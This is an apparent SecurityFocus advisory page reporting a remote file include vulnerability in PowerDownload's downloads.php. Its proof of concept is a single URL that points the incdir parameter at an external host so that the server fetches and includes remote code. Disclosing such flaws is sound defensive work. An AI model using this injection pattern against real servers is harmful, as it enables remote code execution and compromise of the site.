info
discussion
exploit
solution
references
PowerDownload IncDir Remote File Include Vulnerability
No exploit is required.
The following proof of concept is available:
http://www.example.com/download/downloads.php?release_id=650&incdir=http://www.example.com/
Privacy Statement
Copyright 2010, SecurityFocus